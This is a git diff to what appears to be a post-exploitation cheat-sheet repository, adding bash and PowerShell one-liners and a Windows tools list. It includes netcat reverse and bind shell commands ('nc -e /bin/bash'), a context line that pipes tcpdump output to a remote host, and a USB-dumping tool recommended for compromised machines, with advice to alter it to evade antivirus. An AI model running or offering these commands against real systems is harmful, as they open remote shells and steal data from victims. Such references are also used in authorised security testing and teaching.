diff --git a/bins/windows/index.md b/bins/windows/index.md
new file mode 100644
index 0000000..964b81a
--- /dev/null
+++ b/bins/windows/index.md
@@ -0,0 +1,7 @@
+# Useful Windows Binaries
+
+Useful Windows binary tools that can be used for post exploitation.
+
+| Tool | Description / Importance | Contributer |
+| ----------- | ------------------------ | ----------- |
+| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |
diff --git a/scripting/bash.md b/scripting/bash.md
index 37dd3f3..abf1347 100644
--- a/scripting/bash.md
+++ b/scripting/bash.md
@@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
tcpdump -w - | nc -v 8.8.8.8 9999
```
-**Recursively search for files within a directory**
+**Recursively search for text contained in files within a directory**
```bash
zcat -rf ./* | grep "searchstring"
```
+**Recursively search for files with the specified word within them**
+*Submitted by cat on Google Fourms*
+```bash
+ls -a | find | grep -i "string"
+```
+
+**Netcat backdoor**
+*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)*
+```bash
+nc -e /bin/bash *remotecomputer* *port*
+OR
+nc -e /bin/bash -lp *port*
+```
+
+**View CPU Information**
+```bash
+cat /proc/cpuinfo
+```
+
Credits
-----------
-Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
diff --git a/scripting/powershell.md b/scripting/powershell.md
index 94bb7a7..9b655c0 100644
--- a/scripting/powershell.md
+++ b/scripting/powershell.md
@@ -83,4 +83,51 @@ tingSystem=*Server*))" |select name`
* **Output**:
* **Windows 7:** Show/Hide
name
----
PWNT-DC
Exchange1
-SharePoint1
\ No newline at end of file
+SharePoint1
+
+ ### Get Info About All Connected Drives
+ * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()`
+ * **Output**:
+ * **Windows 7:** Show/Hide
+ Name : C:\
+ DriveType : Fixed
+ DriveFormat : NTFS
+ IsReady : True
+ AvailableFreeSpace : 111111111111
+ TotalFreeSpace : 111111111111
+ TotalSize : 111111111111
+ RootDirectory : C:\
+ VolumeLabel : HP
+
+ Name : D:\
+ DriveType : Fixed
+ DriveFormat : NTFS
+ IsReady : True
+ AvailableFreeSpace : 111111111111
+ TotalFreeSpace : 111111111111
+ TotalSize : 111111111111
+ RootDirectory : D:\
+ VolumeLabel : DATA
+
+ Name : E:\
+ DriveType : CDRom
+ DriveFormat :
+ IsReady : False
+ AvailableFreeSpace :
+ TotalFreeSpace :
+ TotalSize :
+ RootDirectory : E:\
+ VolumeLabel :
+
+
+ ### Retrieve BIOS Information (including system serial number)
+ * **Command with arguments**: `gwmi win32_bios`
+ * **Output**:
+ * **Windows 7:** Show/Hide
+ SMBIOSBIOSVersion : 6.0
+ Manufacturer : Phoenix Technologies LTD
+ Name : PheonixBIOS 4.0 Release 6.0
+ SerialNumber : XXXXXXXXXXXXXXXXXXXXXX
+ Version : XXXXXX - XXXXXXX
+
+